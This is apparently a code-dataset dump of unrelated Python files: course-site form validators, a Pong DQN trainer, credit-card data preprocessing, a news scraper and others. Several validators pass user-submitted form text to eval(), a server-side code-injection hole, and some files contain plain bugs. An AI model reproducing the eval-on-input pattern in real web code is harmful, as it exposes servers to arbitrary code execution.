output_processor=Join()\n ) # 게시글 주소\n pic = scrapy.Field(\n input_processor=MapCompose(filter_pic)\n ) # 사진\n pass\n","sub_path":"Retriever_Crawler/Retriever_Crawler/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"144470484","text":"# create a function that takes a list and returns a new list with all the elements doubled\n\nlist = [1, 2, 3, 4, 5, 33, 54, 67]\n\ndef double_list(list):\n new_list = []\n for e in list:\n new_list.append(e*2)\n return new_list\n\nprint(double_list(list))\n","sub_path":"week-03/day-3/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69751247","text":"from wtforms.validators import ValidationError\nfrom static.python.sequence import Sequence\nfrom static.python.phylo import *\n\nfrom random import randrange\nimport re\nimport sre_constants\nfrom static.python.sequence import *\nfrom static.python.phylo import *\nimport string\n\n\nclass CheckRegex(object):\n\n\n def __call__(self, form, field):\n\n if field.data is not None:\n\n correct_seqs = {'chr7:130602946-130603045', 'chr15:5089967-5090066', 'chr19:23226975-23227074'}\n user_seqs = set()\n\n regex = field.data\n\n try:\n tf = re.compile(regex)\n seqs = readFastaFile('chipseq.fa', DNA_Alphabet)\n for seq in seqs:\n seqstr = ''.join(seq.sequence)\n m = tf.match(seqstr)\n if m:\n user_seqs.add(seq.name)\n\n if correct_seqs == user_seqs:\n return\n else:\n\n raise ValidationError('Incorrect. Returning %s sequences %s' % (len(user_seqs), \"\" if len(\n user_seqs) == 0 else \"and they are \" + str(user_seqs) if len(\n user_seqs) < 6 else \" and there are too many to list here.\"))\n except sre_constants.error:\n raise ValidationError(\"The provided regular expression is not valid. Try checking your brackets.\")\n\n\nclass CheckList(object):\n \"\"\"\n Custom validator for WTForms to check\n if the correct list was submitted\n \"\"\"\n\n def __init__(self, correct_list):\n self.correct_list = []\n for item in correct_list.split(\",\"):\n self.correct_list.append(item.upper().strip())\n\n def __call__(self, form, field):\n if field.data is not None:\n check_list = []\n for item in field.data.split(\",\"):\n check_list.append(item.upper().strip())\n check_set = set(check_list)\n correct_set = set(self.correct_list)\n\n if len(check_set) > len(correct_set):\n raise ValidationError(\"You have entered too many responses\")\n\n if len(check_set) < len(correct_set):\n raise ValidationError(\"You haven't entered enough responses\")\n\n if len(check_set - correct_set) > 0:\n # Get the original formatting of the response\n incorrect_responses = []\n for item in field.data.split(\",\"):\n if item.upper().strip() in check_set - correct_set:\n incorrect_responses.append(item.strip())\n\n raise ValidationError('The following responses are not correct - {}'.format(', '.join([x for x in incorrect_responses])))\n\n\nclass CorrectAnswer(object):\n \"\"\"\n Custom validator for WTForms to check\n if the correct answer was submitted\n \"\"\"\n\n def __init__(self, answers):\n self.answers = answers\n\n def __call__(self, form, field):\n # List of error messages that are selected by random\n error_messages = ['Sorry, that\\'s not the correct answer.',\n 'Try that again...',\n 'Incorrect answer.',\n 'Please check this answer...',\n 'Oops! Try again...',\n 'Nope! Sorry... try again!',\n 'No, not quite... try again!',\n 'Hmmm, not exactly right...']\n num = randrange(0, len(error_messages))\n message = error_messages[num]\n\n if field.data is not None:\n for answer in self.answers:\n if answer.strip().upper() == field.data.strip().upper():\n return\n\n raise ValidationError(message)\n\n\nclass CheckNumberRange(object):\n def __init__(self, lower, upper, hint=\"\"):\n self.lower = lower\n self.upper = upper\n self.hint = hint\n\n def __call__(self, form, field):\n\n if field.data is not None:\n if not (self.lower <= float(field.data) <= self.upper):\n if self.hint:\n raise ValidationError(self.hint)\n else:\n raise ValidationError(\"Not in correct range\")\n\n\nclass CheckAlphabet(object):\n def __call__(self, form, field):\n\n if field.data is not None:\n\n valid = False\n\n invalids = ['J', 'O', 'Z']\n\n valids = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',\n 'W', 'X', 'Y', '-']\n\n if any(x in field.data for x in invalids):\n raise ValidationError(\"Incorrect: Your answer shouldn't contain a J, O, or Z\")\n\n elif any(x for x in field.data if x not in valids):\n raise ValidationError(\n \"Incorrect: Your answer should only contain uppercase alphabetic characters or a gap symbol\")\n\n try:\n seq1 = Sequence(field.data.upper())\n valid = True\n except:\n pass\n if valid:\n raise ValidationError(\"Incorrect: This is a valid sequence\")\n\n\nclass CheckNewick(object):\n def __init__(self, answer):\n self.answer = answer\n\n def __call__(self, form, field):\n\n if field.data is not None:\n try:\n field.data.replace(\" \", \"\")\n newick = parseNewick(field.data)\n newick.canonise()\n if str(newick) != self.answer:\n raise ValidationError(\"This Newick string is not correct.\")\n except:\n raise ValidationError(\"This Newick string is not correct.\")\n\n\nclass CheckThreshold(object):\n def __init__(self, answer, incorrect):\n self.answer = answer\n self.incorrect = incorrect\n\n def __call__(self, form, field):\n\n if field.data is not None:\n\n if '.' not in field.data:\n raise ValidationError(\"Your answer is not to three decimal places\")\n\n elif len(field.data.split('.')[1]) != 3:\n raise ValidationError(\"Your answer is not to three decimal places\")\n\n if field.data == self.answer:\n return\n elif field.data == self.incorrect:\n raise ValidationError(\n \"It looks like you've taken the maximum and minimum scores and divided by two. This isn't correct.\")\n else:\n raise ValidationError(\"That isn't the correct threshold\")\n # else:\n # raise ValidationError('This threshold is not correct')\n # except:\n # raise ValidationError(\"That isn't the correct threshold\")\n\n\nclass CheckMotifMatches(object):\n def __init__(self, answer, incorrect):\n self.answer = answer\n self.incorrect = incorrect\n\n def __call__(self, form, field):\n\n if field.data is not None:\n if field.data == self.answer:\n return\n elif field.data == self.incorrect:\n raise ValidationError(\"This answer is incorrect. It looks like you only considered one strand\")\n else:\n raise ValidationError(\"This answer is incorrect\")\n\n\nclass CheckAccuracyScore(object):\n def __init__(self, sens, spec, accur, wanted):\n scores_dict = {}\n scores_dict[sens] = 'Sensitivity'\n scores_dict[spec] = 'Specificity'\n scores_dict[accur] = 'Accuracy'\n self.scores_dict = scores_dict\n self.wanted = wanted\n\n def __call__(self, form, field):\n\n if field.data is not None:\n\n if '.' not in field.data:\n raise ValidationError(\"Your answer is not to three decimal places\")\n\n elif len(field.data.split('.')[1]) != 3:\n raise ValidationError(\"Your answer is not to three decimal places\")\n\n for score in self.scores_dict.keys():\n if field.data == score:\n if self.scores_dict[field.data] == self.wanted:\n return\n else:\n raise ValidationError(\n 'You need to provide the {} score but you have provided the {} score'.format(self.wanted,self.scores_dict[field.data]))\n\n else:\n continue\n raise ValidationError('This score is not correct')\n\n\nclass CheckSCIE2100Practical2SeqPairsCode(object):\n\n def __init__(self, answer):\n self.answer = answer\n\n def __call__(self, form, field):\n if field.data is not None:\n numSeqs = 20\n columns = 100\n if \"=\" not in field.data or \"seqPairs\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. It should start with seqPairs =\")\n try:\n seqPairs = eval(field.data.split(\"=\")[1])\n if seqPairs != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n except NameError:\n raise ValidationError(\"Make sure you have named your variables correctly\")\n except (ValueError, SyntaxError, TypeError) as e:\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\n\n\n\n\n\nclass CheckSCIE2100Practical2AAPairsCode(object):\n\n def __init__(self, answer):\n self.answer = answer\n\n def __call__(self, form, field):\n if field.data is not None:\n seqPairs = 190\n columns = 100\n if \"=\" not in field.data or \"aaPairs\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. It should start with aaPairs = \")\n\n try:\n check = eval(field.data.split(\"=\")[1])\n if check != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n except NameError:\n raise ValidationError(\"Make sure you have named your variables correctly\")\n except (ValueError, SyntaxError, TypeError) as e:\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\nclass CheckSCIE2100Practical2ProbabilityCode(object):\n\n def __init__(self, answer, identical):\n self.answer = answer\n self.identical = identical\n\n def __call__(self, form, field):\n if field.data is not None:\n a = \"A\"\n b = \"N\"\n\n # Check if a == b\n if self.identical:\n s1 = Sequence('APGNER', Protein_Alphabet)\n s2 = Sequence('APGNER', Protein_Alphabet)\n else: # a != b\n s1 = Sequence('AAPG', Protein_Alphabet)\n s2 = Sequence('ANLP', Protein_Alphabet)\n\n # Create a background Distribution\n b62 = readSubstMatrix('static/python/blosum62.matrix', Protein_Alphabet)\n glob = alignGlobal(s1, s2, b62, -8)\n p = glob.calcBackground()\n\n\n if \"=\" not in field.data or \"eab\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. It should start with eab = \")\n\n elif \"[\" not in field.data and \".prob\" not in field.data:\n raise ValidationError(\"Are you indexing correctly?\")\n elif \"p\" not in field.data or \"b\" not in field.data or \"a\" not in field.data:\n raise ValidationError(\"Make sure you're using the correct variable names\")\n\n try:\n check = eval(field.data.split(\"=\")[1])\n if check != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n # except NameError:\n # raise ValidationError(\"Make sure you have named your variables correctly\")\n except (AttributeError, ValueError, SyntaxError, TypeError, NameError) as e:\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\n\n\n\nclass CheckPalindrome(object):\n def __call__(self, form, field):\n if field.data is not None:\n cleaned_data = \"\".join(l for l in field.data.upper() if l not in string.punctuation)\n cleaned_data = cleaned_data.replace(\" \", \"\")\n\n if cleaned_data == cleaned_data[::-1]:\n return\n else:\n raise ValidationError(\"That is not a palindrome\")\n\n\nclass CheckDomainBoundaries(object):\n\n def __init__(self, lower, upper):\n self.lower = lower\n self.upper = upper\n\n def __call__(self, form, field):\n\n if field.data is not None:\n try:\n check_lower = float(field.data.split(\"-\")[0])\n check_upper = float(field.data.split(\"-\")[1])\n\n if check_upper < check_lower:\n raise ValidationError(\"The upper boundary must be higher than the lower boundary\")\n\n if check_upper - check_lower < 10:\n raise ValidationError(\"That domain is too short\")\n\n if check_upper - check_lower > 30:\n raise ValidationError(\"That domain is too long\")\n\n except IndexError:\n raise ValidationError(\"The format you've entered your answer in is incorrect\")\n\n except ValueError as e:\n if str(e).startswith(\"could not convert string to float\"):\n raise ValidationError(\"Make sure you're only entering numbers and the - symbol\")\n else:\n raise ValidationError(e)\n\n if not (self.lower <= check_lower < check_upper <= self.upper):\n raise ValidationError(\"These are not the correct domain boundaries\")\n\nclass CheckGapPenalty(object):\n\n def __call__(self, form, field):\n\n if field.data is not None:\n if \".\" in field.data:\n field.data = field.data.split(\".\")[0]\n check = int(field.data)\n if check >= 0:\n raise ValidationError(\"A score of zero or positive will lead to inaccurate, gappy alignments\")\n if check == -1 or check == -2:\n raise ValidationError(\"A score this high would lead to an unusually high number of gaps\")\n if check <= -8:\n\n raise ValidationError(\"A score this low will force a high number of mismatches in the alignment which is not ideal\")\n\n\nclass CompareNumbers(object):\n\n\n def __init__(self, greater):\n self.greater = True if greater == \"greater\" else False\n\n def __call__(self, form, field):\n\n # print ((field.data.split(\",\")[0]).isdigit())\n\n if field.data is not None:\n if \",\" not in field.data:\n raise ValidationError(\"Make sure you seperate your two values with a comma\")\n\n try:\n first = float(field.data.split(\",\")[0])\n second = float(field.data.split(\",\")[1])\n except:\n raise ValidationError(\"Make sure you only enter numbers as your values\")\n\n else:\n correct = (first > second) if self.greater else (first < second)\n\n if correct:\n return\n else:\n raise ValidationError(\"tripletAlignGlobal should take longer than alignGlobal\")\n\n\nclass CheckTripletAlignGlobal(object):\n\n\n def __init__(self, answer, length):\n self.answer = answer\n self.length = length\n\n def __call__(self, form, field):\n if field.data is not None:\n\n N = self.length\n\n if \"=\" not in field.data or \"matrix_size\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. It should start with matrix_size = \")\n\n elif \"N\" not in field.data:\n raise ValidationError(\"You should be using a variable named N\")\n\n try:\n check = eval(field.data.split(\"=\")[1])\n if check != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n\n except (AttributeError, ValueError, SyntaxError, TypeError, NameError) as e:\n\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\nclass CheckSelectField(object):\n\n def __init__(self, answer):\n self.answer = answer\n\n def __call__(self, form, field):\n if field.data is not None:\n if field.data == self.answer:\n return\n else:\n raise ValidationError(\"This isn't the correct response\")\n\n\nclass CheckPoissonDistance(object):\n\n\n def __init__(self, answer, fraction_of_positions):\n self.answer = answer\n self.fraction_of_positions = fraction_of_positions\n\n def __call__(self, form, field):\n if field.data is not None:\n\n p = self.fraction_of_positions\n\n if \"=\" not in field.data or \"dist\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. It should start with dist = \")\n\n elif \"p\" not in field.data:\n raise ValidationError(\"You should be using a variable named p\")\n\n try:\n check = eval(field.data.split(\"=\")[1])\n if check != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n\n except (AttributeError, ValueError, SyntaxError, TypeError, NameError) as e:\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\n\nclass Unique(object):\n def __init__(self, model, field, message=u'This element already exists.'):\n self.model = model\n self.field = field\n self.message = message\n\n def __call__(self, form, field):\n check = self.model.query.filter(self.field == field.data).first()\n if check:\n raise ValidationError(self.message)","sub_path":"form_validators.py","file_name":"form_validators.py","file_ext":"py","file_size_in_byte":18382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"158785911","text":"import pygame\r\nimport json\r\nclass Options:\r\n def __init__(self,game):\r\n game.setBackground(\"src/image/bg.png\",game.screen)\r\n imageTitre=game.setAnImage(\"src/image/Options.png\",[278, 160],(game.rectBackground.center[0],game.taille[1] - game.taille[1]*0.77),game.screen)\r\n self.boucle=True\r\n self.actualScreen=\"Options\"\r\n BoutonPleinEcran=game.setBouton(\"src/image/BoutonPleinEcran.png\",\"src/image/BoutonPleinEcranHover.png\",\"src/image/BoutonPleinEcranOnClick.png\",[285 , 75],(game.rectBackground.center[0], game.taille[1]-game.taille[1]*0.55),game.screen)\r\n BoutonSons=game.setBouton(\"src/image/BoutonSons.png\",\"src/image/BoutonSonsHover.png\",\"src/image/BoutonSonsOnClick.png\",[285 , 75],(game.rectBackground.center[0], game.taille[1]-game.taille[1]*0.4),game.screen)\r\n BoutonReset=game.setBouton(\"src/image/BoutonReset.png\",\"src/image/BoutonResetHover.png\",\"src/image/BoutonResetOnClick.png\",[285 , 75],(game.rectBackground.center[0], game.taille[1]-game.taille[1] * 0.25),game.screen)\r\n BoutonRetour=game.setBouton(\"src/image/BoutonRetour.png\",\"src/image/BoutonRetourHover.png\",\"src/image/BoutonRetourOnClick.png\",[285 , 75],(game.rectBackground.center[0], game.taille[1]-game.taille[1] * 0.11),game.screen)\r\n\r\n pygame.display.flip()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT: # Si l'event est QUIT alors on quitte la boucle et on ferme la fenetre\r\n self.boucle=False\r\n pygame.quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_focused:\r\n if BoutonRetour[\"bouton\"][\"rect\"].collidepoint(pygame.mouse.get_pos()):\r\n if pygame.mouse.get_pressed()==(True,False,False):\r\n self.actualScreen=\"Menu\"\r\n elif BoutonPleinEcran[\"bouton\"][\"rect\"].collidepoint(pygame.mouse.get_pos()):\r\n if pygame.mouse.get_pressed()==(True,False,False):\r\n pygame.display.toggle_fullscreen()\r\n\r\n elif BoutonReset[\"bouton\"][\"rect\"].collidepoint(pygame.mouse.get_pos()):\r\n if pygame.mouse.get_pressed()==(True,False,False):\r\n niveau = {\r\n \"Niveau1\" : 0,\r\n \"Niveau2\" : 0,\r\n \"Niveau3\" : 0\r\n }\r\n resetFichier = open(\"listeLVL.json\", \"w\")\r\n json.dump(niveau, resetFichier, indent = 4 )\r\n resetFichier.close()","sub_path":"Simulateur/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317943050","text":"import tensorflow as tf\nimport cv2 # read in pixel data\nimport pong # our class\nimport numpy as np # math\nimport random # random\nfrom collections import deque # queue data structure. fast appends. and pops. replay memory\n\n# definine hyperparameters\nACTIONS = 3 # up, down, stay\nGAMMA = 0.99 # define our learning rate\nINITIAL_EPSILON = 1.0 # for updating our gradient or training over time\nFINAL_EPSILON = 0.05 # final value of epsilon\nOBSERVE = 1000 # timesteps to observe before training\nEXPLORE = 1000 # frames over which to anneal epsilon\nREPLAY_MEMORY = 250000 # store our experiences, the size of it (test, how much your ram can fit!)\nBATCH = 32 # batch size to train on\nT_MAX = 1000000 # number of training iterations\nS_MAX = 100 # the score our agent shall reach\n\n# create tensorflow graph\ndef CreateGraph():\n # network weights\n W_conv1 = tf.Variable(tf.truncated_normal([8, 8, 4, 32], stddev=0.01))\n b_conv1 = tf.Variable(tf.constant(0.01, shape=[32]))\n\n W_conv2 = tf.Variable(tf.truncated_normal([4, 4, 32, 64], stddev=0.01))\n b_conv2 = tf.Variable(tf.constant(0.01, shape=[64]))\n\n W_conv3 = tf.Variable(tf.truncated_normal([3, 3, 64, 64], stddev=0.01))\n b_conv3 = tf.Variable(tf.constant(0.01, shape=[64]))\n\n W_fc4 = tf.Variable(tf.truncated_normal([1600, 512], stddev=0.01))\n b_fc4 = tf.Variable(tf.constant(0.01, shape=[512]))\n\n W_fc5 = tf.Variable(tf.truncated_normal([512, ACTIONS], stddev=0.01))\n b_fc5 = tf.Variable(tf.constant(0.01, shape=[ACTIONS]))\n\n # input layer for pixel data\n s = tf.placeholder(\"float\", [None, 80, 80, 4])\n\n # Computes rectified linear unit activation fucntion (relu) on a 2-D convolution given 4-D input and filter tensors\n conv1 = tf.nn.relu(tf.nn.conv2d(s, W_conv1, strides=[1, 4, 4, 1], padding=\"SAME\") + b_conv1)\n pool1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n\n conv2 = tf.nn.relu(tf.nn.conv2d(pool1, W_conv2, strides=[1, 2, 2, 1], padding=\"SAME\") + b_conv2)\n conv3 = tf.nn.relu(tf.nn.conv2d(conv2, W_conv3, strides=[1, 1, 1, 1], padding=\"SAME\") + b_conv3)\n\n conv3_flat = tf.reshape(conv3, [-1, 1600])\n fc4 = tf.nn.relu(tf.matmul(conv3_flat, W_fc4) + b_fc4)\n fc5 = tf.matmul(fc4, W_fc5) + b_fc5\n\n return s, fc5\n\n# deep q network. feed in pixel data to graph session\ndef TrainGraph(inp, out, sess):\n # to calculate the argmax, we multiply the predicted output with a vector with one value 1 and rest as 0\n argmax = tf.placeholder(\"float\", [None, ACTIONS])\n gt = tf.placeholder(\"float\", [None]) #ground truth\n\n # action\n action = tf.reduce_sum(tf.multiply(out, argmax), axis=1)\n # cost function we will reduce through backpropagation\n cost = tf.reduce_mean(tf.square(gt - action))\n # optimization function to reduce our minimize our cost function\n train_step = tf.train.AdamOptimizer(1e-6).minimize(cost)\n\n # initialize our game\n game = pong.PongGame()\n\n # create a queue for experience replay to store policies\n D = deque()\n \n # action do nothing\n argmax_t = np.zeros([ACTIONS])\n argmax_t[0] = 1\n # initial frame\n frame = game.GetFrame(argmax_t)[1]\n # convert rgb to gray scale for processing\n frame = cv2.cvtColor(cv2.resize(frame, (80, 80)), cv2.COLOR_BGR2GRAY)\n # binary colors, black or white\n ret, frame = cv2.threshold(frame, 1, 255, cv2.THRESH_BINARY)\n # stack frames, that is our input tensor\n inp_t = np.stack((frame, frame, frame, frame), axis=2)\n\n # saver\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n checkpoint = tf.train.get_checkpoint_state(\"saved_networks\")\n if checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(sess, checkpoint.model_checkpoint_path)\n print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\n else:\n print(\"Could not find saved networks\")\n\n stats_log = open(\"logs/stats.log\", \"w\")\n # total game score\n score = 0\n\n t = 0\n epsilon = INITIAL_EPSILON\n\n # training time\n while True:\n # output tensor\n out_t = out.eval(feed_dict={ inp: [inp_t] })[0]\n # argmax function\n argmax_t = np.zeros([ACTIONS])\n\n if random.random() <= epsilon or t <= OBSERVE:\n maxIndex = random.randrange(ACTIONS)\n r_dec = \"True\" # optional for logging, True if randomly decided\n else:\n maxIndex = np.argmax(out_t)\n r_dec = \"False\"\n argmax_t[maxIndex] = 1\n\n # scale down epsilon\n if epsilon > FINAL_EPSILON and t > OBSERVE:\n epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\n\n # reward tensor if score is positive\n reward_t, frame = game.GetFrame(argmax_t)\n # get frame pixel data\n frame = cv2.cvtColor(cv2.resize(frame, (80, 80)), cv2.COLOR_BGR2GRAY)\n ret, frame = cv2.threshold(frame, 1, 255, cv2.THRESH_BINARY)\n frame = np.reshape(frame, (80, 80, 1))\n\n # new input tensor\n inp_t1 = np.append(frame, inp_t[:, :, 0:3], axis=2)\n\n # add our input tensor, argmax tensor, reward and updated tensor to stack of experiences\n D.append((inp_t, argmax_t, reward_t, inp_t1))\n\n # if we run out of replay memory, make room\n if len(D) > REPLAY_MEMORY:\n D.popleft()\n\n # training iteration\n if t > OBSERVE:\n # get values from our replay memory\n minibatch = random.sample(D, BATCH)\n\n inp_batch = [d[0] for d in minibatch]\n argmax_batch = [d[1] for d in minibatch]\n reward_batch = [d[2] for d in minibatch]\n inp_t1_batch = [d[3] for d in minibatch]\n\n gt_batch = []\n out_batch = out.eval(feed_dict={ inp: inp_t1_batch })\n\n # add values to our batch\n for i in range(0, len(minibatch)):\n gt_batch.append(reward_batch[i] + GAMMA * np.max(out_batch[i]))\n\n # train on that\n train_step.run(feed_dict={\n gt: gt_batch,\n argmax: argmax_batch,\n inp: inp_batch\n })\n\n # update our input tensor the next frame\n inp_t = inp_t1\n t += 1\n\n # print out where we are\n if t <= OBSERVE:\n state = \"observe\"\n elif OBSERVE < t < OBSERVE + EXPLORE:\n state = \"explore\"\n else:\n state = \"train\"\n\n score += reward_t\n\n stats = \"TIMESTEP {:7} | SCORE: {: 5} | STATE {:7} | EPSILON {:6.4f} | ACTION {} | R_DEC {:5} | REWARD {:2d} | Q_MAX {: e}\".format(t, score, state, epsilon, maxIndex, r_dec, reward_t, np.max(out_t))\n print(stats)\n # write into file\n stats_log.write(stats + \"\\n\")\n\n #save images\n #if t % 10000 <= 100:\n # cv2.imwrite(\"logs/images/frame\" + str(t) + \".png\", frame)\n\n\n # save our session every 10000 steps\n if t % 10000 == 0:\n saver.save(sess, \"saved_networks/pong_game-dqn.chk\", global_step=t)\n print(\"Session saved.\")\n\n if t == T_MAX:\n return\n #if score == S_MAX:\n # return\n\n\ndef Main():\n try:\n #create session\n sess = tf.InteractiveSession()\n #input layer and output layer by creating graph\n inp, out = CreateGraph()\n #train our graph on input and output with session variables\n TrainGraph(inp, out, sess)\n except KeyboardInterrupt:\n print(\"Closing Session...\")\n sess.close()\n exit()\n\nif __name__ == \"__main__\":\n Main()\n","sub_path":"RL.py","file_name":"RL.py","file_ext":"py","file_size_in_byte":7540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"254290175","text":"#!/usr/bin/env python3\n# ============================================================================\n# File: credit_card.py\n# Created: 2019-10-10\n# ----------------------------------------------------------------------------\n# Description:\n# \n# ============================================================================\nimport numpy as np\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, MinMaxScaler\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.decomposition import PCA\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn import linear_model\nimport pandas as pd\nimport time\nimport matplotlib.pyplot as plt\nfrom scikitplot.metrics import plot_confusion_matrix\nimport scikitplot.metrics as skplt\nimport seaborn as sns\nfrom matplotlib.patches import Rectangle\n\n\nfrom pylearn.logisticregression import SGDClassification\nfrom pylearn.linearmodel import Regression\nfrom pylearn.metrics import *\nfrom pylearn.multilayerperceptron import MultilayerPerceptron\nfrom pylearn.resampling import *\n\n\n\ndef preprocess_CC_data(filename, which_onehot = 1):\n \"\"\"\n Function for preprocessing the credit card data. Removes outliers in the\n data set, and uses one hot encoding on categorical features.\n\n Inputs:\n - filename of the data set\n - which_onehot:\n - \"1\" specifies to one hot encode the features sex, education and marriage\n - \"2\" specifies to one hot encode the features sex, education, marriage and payment history\n\n Returns:\n - The design matrix, shape (n_observations, n_features).\n - Target vector, shape (n_observations,).\n - Indices of continuous features in the data set\n \"\"\"\n\n nanDict = {}\n df = pd.read_excel(filename, header=1, skiprows=0, index_col=0, na_values=nanDict)\n df.rename(index=str, columns={\"default payment next month\": \"defaultPaymentNextMonth\"}, inplace=True)\n\n\n X = df.loc[:, df.columns != 'defaultPaymentNextMonth'].values\n y = df.loc[:, df.columns == 'defaultPaymentNextMonth'].values\n\n\n #find and remove outliers in the data\n outlier_gender1 = np.where(X[:,1] < 1)[0]\n outlier_gender2 = np.where(X[:,1] > 2)[0]\n\n outlier_education1 = np.where(X[:,2] < 1)[0]\n outlier_education2 = np.where(X[:,2] > 4)[0]\n\n outlier_marital1 = np.where(X[:,3] < 1)[0]\n outlier_marital2 = np.where(X[:,3] > 3)[0]\n\n inds = np.concatenate((outlier_gender1,\n outlier_gender2,\n outlier_education1,\n outlier_education2,\n outlier_marital1,\n outlier_marital2))\n\n\n outlier_rows = np.unique(inds)\n\n X = np.delete(X, outlier_rows, axis=0)\n y = np.delete(y, outlier_rows, axis=0)\n\n\n\n #split data into categorical and continuous features\n if which_onehot==1:\n #only marriage, sex and education onehot encoded\n categorical_inds = (1, 2, 3)\n continuous_inds = (0, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22)\n\n\n elif which_onehot==2:\n #all categories onehot encoded\n categorical_inds = (1, 2, 3, 5, 6, 7, 8, 9, 10)\n continuous_inds = (0, 4, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22)\n\n else:\n print('which_onehot must be specified as either 1 or 2')\n exit(0)\n\n X_cat = X[:,categorical_inds]\n X_cont = X[:, continuous_inds]\n\n\n #onehot encode categorical data\n onehotencoder = OneHotEncoder(categories=\"auto\", sparse=False)\n preprocessor = ColumnTransformer(\n remainder=\"passthrough\",\n transformers=[\n ('onehot', onehotencoder, list(range(X_cat.shape[1])))])\n\n X_cat = preprocessor.fit_transform(X_cat)\n\n #join categorical and continuous features\n X = np.concatenate((X_cont, X_cat), axis=1)\n\n continuous_feature_inds = list(range(X_cont.shape[1]))\n\n return X, np.ravel(y), continuous_feature_inds\n\n\n\ndef credit_card_train_test(filename, which_onehot=1, balance_outcomes=True):\n\n X, y, scale_columns = preprocess_CC_data(filename,\n which_onehot=which_onehot)\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)\n\n\n #balance training set such that outcomes are 50/50\n if balance_outcomes:\n non_default_inds = np.where(y_train==0)[0]\n default_inds = np.where(y_train==1)[0]\n\n remove_size = len(non_default_inds) - len(default_inds)\n remove_inds = np.random.choice(non_default_inds, size=remove_size, replace=False)\n\n X_train = np.delete(X, remove_inds, axis=0)\n y_train = np.delete(y, remove_inds, axis=0)\n\n minmaxscaler = MinMaxScaler()\n scaler = ColumnTransformer(\n remainder='passthrough',\n transformers=[('minmaxscaler', minmaxscaler, scale_columns)])\n\n\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n\n y_train = y_train.reshape(-1,1)\n encoder = OneHotEncoder(categories='auto')\n y_train_1hot = encoder.fit_transform(y_train).toarray()\n y_test_1hot = encoder.fit_transform(y_test.reshape(-1,1)).toarray()\n\n\n return X, X_train, X_test, y, y_train, y_train_1hot, y_test, y_test_1hot\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"project2/src/creditcard.py","file_name":"creditcard.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"436365192","text":"import pandas as pd\nfrom selenium import webdriver\n\npath_to_chromedriver = '/Users/jonathantang/Desktop/chromedriver' \nbrowser = webdriver.Chrome(executable_path = path_to_chromedriver)\n\ntc_df = pd.DataFrame(index=np.arange(0, 19978), columns=('subject', 'url'))\narticle_index = 0\n\n#Iterate through each page\nfor page_num in range(1,1000):\n url = 'https://techcrunch.com/page/'+str(page_num)\n browser.get(url)\n \n news_items = browser.find_elements_by_class_name('river-block')\n for news_item in news_items:\n \n title = news_item.get_attribute(\"data-sharetitle\")\n url = news_item.get_attribute(\"data-permalink\")\n \n \n entry = [title, url]\n tc_df.loc[article_index]= entry\n article_index+=1\n \ntc_df.to_pickle('techcrunch_20k.pkl') ","sub_path":"techcrunch_headline_webscraper.py","file_name":"techcrunch_headline_webscraper.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"144315409","text":"from sklearn import neighbors\nimport numpy as np\n\n\n\n# read csv file into numpy\nx = np.genfromtxt(\"C:\\\\Users\\dick\\\\Desktop\\\\Machien Learning\\\\HousePrice\\\\x.csv\", dtype=np.float64, delimiter=',', skip_header=1)\ny = np.genfromtxt(\"C:\\\\Users\\dick\\\\Desktop\\\\Machien Learning\\\\HousePrice\\\\y.csv\", dtype=np.float64, delimiter=',', skip_header=1)\n\ndef 